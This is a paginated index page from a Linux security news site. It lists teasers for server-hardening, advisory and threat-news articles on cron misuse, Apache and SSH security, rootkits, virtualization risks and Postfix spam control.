Server Security - Page 17
We have thousands of posts on a wide variety of open source and security topics, conveniently organized for searching or just browsing.
Misuse of Cron Jobs for Long-Term Access in Linux Environments
Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it c...
Securing Remote Access to Linux Servers: Best Practices for 2026
Linux runs the internet. More than 96% of the world’s t...
Linux AI Tools Require Enhanced Observability for Security
Linux security has traditionally depended on logs, metr...
Discover Server Security News
Comprehensive Guide to Setting Up Postfix for Optimal Spam Control
The last few weeks have seen a dramatic increase in spam (once again). Estimates say that spam makes now up for 80 - 90% of all emails, and many mail servers have difficulties in managing the additional load caused by the latest spam, and spam filters such as SpamAssassin do not recognize large parts of that spam as they did before. Fortunately, we can block a big amount of that spam at the MTA level, for example by using blacklists, running tests on the sender and recipient domains, etc.
Microsoft IIS Server Exposes Double Malware Risk According To Research
Web sites running Microsoft Corp.'s Web server software are twice as likely to be hosting malicious code as other Web sites, according to research from Google Inc. Last month, Google's Anti-Malware team looked at 70,000 domains that were either distributing malware or hosting attack code. "Compared to our sample of servers across the Internet, Microsoft IIS features twice as often as a malware-distributing server," wrote Google's Nagendra Modadugu, in a Tuesday blog posting.
Essential Backup Techniques For MySQL Database Management
Backing up files and directories is relatively easy; databases, however, have some special quirks that you need to address. Our examples use MySQL, but the same principles apply to PostgreSQL and other relational databases. This article is excerpted from O'Reilly's recently published book Linux System Administration .
Rootsh Terminal Logger for Admin Monitoring and Activity Tracking
Rootsh is a shell that logs everything a root user sees on his terminal. This is useful if you have more than one system administrator for a server and you want a record of exactly what any given user does. Despite the fact that the latest rootsh release was in March 2005, it still does its job great.
Exploring Rootkits as an Emerging Threat to Enterprise Security
Late at night, a system administrator performed a routine check of a crashed server, one of 48 systems comprising a major online infrastructure that generated about $4 million per month in revenue. He was a bit surprised that the system had gone down, as it had been humming for months without any indication of being prone to crashing. The check uncovered three encrypted files. The administrator called on MANDIANT to analyze them.
Virtualization Security: Addressing Monitoring Challenges in Data Centers
Deployment of products that transform physical servers into "virtual machines" has resulted in nothing short of a data centre revolution. But virtualization of everything from operating systems to applications increasingly has critics asking: Where's the security? "Traffic is going from virtual machine to virtual machine," points out Neil MacDonald, vice president of research firm Gartner. "Where's the monitoring, the intrusion-detection and protection?"
Implement SSHjail To Improve OpenSSH Server Security Isolation
Jailing is a mechanism to virtually change a system's root directory. By employing this method, administrators can isolate services so that they cannot access the real filesystem structure. You should run unsecured and sensitive network services in a chroot jail, because if a hacker can break into a vulnerable service he could exploit your whole system. If a service is jailed, the intruder will be able to see only what you want him to see -- that is, nothing useful. Some of the most frequent targets of attack, which therefore should be jailed, are BIND, Apache, FTP, and SSH. SSHjail is a patch for the OpenSSH daemon. It modifies two OpenSSH files (session.c and version.h) and allows you to jail your SSH service without any need for SSH reconfiguration.
SMTP Authentication Update: Overview of Industry Progress and Standards
It's about 2 and a half years since the standards bodies threw up their hands and left SMTP authentication to the industry. Implementation progress has been slow but positive. And there have been some surprises.
Gartner Report Warns About Security Issues In Virtualization Technologies
Companies in a rush to deploy virtualization technologies for server consolidation efforts could wind up overlooking many security issues and exposing themselves to risks, warns research firm Gartner.
2006 OS Security Report: Insights and Trends on Vulnerabilities
Computer security is a precarious business both from a product development and administrative standpoint. Operating system vendors are forced to constantly patch their software to keep consumers protected from the latest digital threats. But which operating systems are the most secure? A recent report by Symantec hints that Windows currently presents fewer security holes than its commercial competitors.
Comprehensive Overview of NSA Security Guidance for Operating Systems
NSA has developed and distributed configuration guidance for operating systems. These guides are currently being used throughout the government and by numerous entities as a security baseline their systems.
Understanding Database Protocol Loopholes And Access Risks
A security expert is warning database administrators about a continued loophole in database communication protocols that would allow an attacker to bypass access controls and gain access to critical files.
Essential Tips For Securing Your Apache Server Configuration
Last week I gave a few tips about SSH, so this week I think I will give a few tips about apache. Just to reiterate, these are tips that have worked for me and they may not be as efficient or as effective for your style of system administration.
Tips for Organizing SSH Keys and Managing Server Access
Over the years, I have worked with many SSH boxen and had the pleasure to manage even more SSH keys. The problem with all that is the keys start to build up and then you wonder which boxes have which keys in the authorized keys file and so on and so on. Well, I can
Enhancing Linux Networking With Layered Security Techniques
If you want to leave certain nice to do's or ease of use functionality available to your self such as leaving SSH open only to root or having a machine with anonymous FTP access available, then take a slightly different approach to securing your environment (or those particular machines): layered security. Without changing the physical layout of your network, change the network layout using iptables and/or tcp wrappers.
Securing Apache/PHP: Essential Tools And Techniques For Maximum Security
Nathan wrote in earlier with attempts to exploit PHP file inclusion that his server had automatically thwarted. He's promoting the use of mod_security, mod_evasive, fail2ban and suhosin in a Apache/PHP environment. Since knowledge and experience is a way to win from the bad guys, how about sharing your favorite setup for Apache/PHP security (Basically a "LAMP" environment although I'd rather not focus on the OS part in there) and we'll summarize on this page. Also let us know what you like of the components you use, why they are your favorite etc.
Maximizing Apache Httpd Logs For Effective Monitoring And Tracking
No doubt you're already aware of the standard logfiles that Apache httpd creates for you. There's the access log, which tells you every time a request is made to your server. There's also the error log, which makes a note every time something goes wrong or something of interest happens that you should know about. Click this Mojo Ad There are a few things that you can do to make your access log more useful, such as using the combined, rather than the common, logfile format--but that's another article. Look at the documentation for mod_log_config for more information on that.
Sun Solaris 10 Security Advisory: ICMP Causes Kernel Panic
Sun Microsystems has issued a security update intended for computers running Sun Solaris 10 operating system. The update patches a security vulnerability that could cause kernel panic by sending one false ICMP request. The vendor does not disclose the conditions required for the attack to occur, but in its security advisory, Sun suggest testing whether a system responds to ICMP echo requests using a normal ping utility.
Zero-Day Attacks: Software Risks and Malware Trends Explained
The recent surge in malware attacks against zero-day flaws in some of the most widely used software packages is confirmation of an IT administrator's worst nightmare: Stand-alone, signature-based anti-virus software offers no protection from sophisticated online criminals.During 2006, there was a wave of zero-day attacks against Microsoft Office applications
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!